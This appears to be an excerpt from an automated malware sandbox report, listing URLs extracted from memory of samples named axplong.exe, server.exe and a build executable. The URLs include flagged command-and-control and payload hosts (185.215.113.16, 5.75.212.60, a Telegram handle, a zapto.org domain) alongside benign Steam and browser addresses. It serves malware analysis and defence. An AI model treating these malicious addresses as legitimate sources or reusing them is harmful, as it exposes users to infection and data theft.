https://5.75.212.60/msvcp140.dlld	build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic06	server.exe, 00000009.00000002.2949630589.0000021547895000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpft	axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s.ytimg.com;	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpnu	axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic	server.exe, 00000009.00000002.2949630589.0000021547895000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privac	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://steam.tv/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/(	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.phpUsers	axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	false	URL Reputation: safe	unknown
https://5.75.212.60/?	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://t.me/armad2a	build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.212.60/4	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://arpdabl.zapto.org/1/z	build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.0000000019010000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/L	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.212.60/softokn3.dllj	build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0	build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://sketchfab.com	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.212.60/E	build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lv.queniujq.cn	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privacy_agreement/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://arpdabl.KFHJJJKKFH	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/Z	build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	true	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://5.75.212.60art/form-data;	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709Pyrb	server.exe, 00000009.00000002.2949630589.00000215478AE000.00000004.00001000.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949425012.0000021547805000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949425012.00000215477E6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949630589.00000215478BC000.00000004.00001000.00020000.00000000.sdmp, server.exe, 00000009.00000003.2938513902.00000215477E6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000003.2938342842.0000021547805000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/about/	76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/my/wishlist/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php6323e228833c10fe3eb39f1caffb81382ae#xe	axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedy1	axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://t.me/armad2ahellosqls.dllsqlite3.dllIn	build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/market/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=	axplong.exe, 00000007.00000002.3354999318.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/inc/server.exe9c5867ee8	axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://store.steampowered.com/subscriber_agreement/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/build_2024-07-25_20-56.exe	axplong.exe, 00000007.00000002.3354999318.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
